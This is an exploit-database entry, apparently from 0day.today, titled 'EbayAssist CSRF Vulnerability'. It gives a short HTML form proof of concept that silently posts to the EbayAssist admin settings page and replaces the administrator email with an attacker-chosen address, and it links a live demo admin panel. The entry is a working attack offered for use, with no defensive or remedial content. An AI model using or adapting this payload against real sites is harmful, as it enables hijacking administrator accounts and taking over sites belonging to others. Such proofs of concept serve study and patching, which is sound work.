id: 17689
date: 03/13/2012
title: EbayAssist CSRF Vulnerability
author: Jonturk75
cves: 

# Exploit Title: EbayAssist CSRF 
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/ebayassist-sell-digital-goods-on-ebay/22731/
# Category::  webapps
# Demo : http://idevspot.com/demo/EbayAssist/admin
# Greetz: Inj3ct0r Exploit DataBase 1337day.com



<form action="target.com/[PATH]/?page=settings" method="post" name="form1">
<input type="hidden" value="yourmail@mail.com" size="40" name="EMAIL"/>
<input type="submit" value="Save" name="Submit"/>



#  0day.today [2023-03-21]  #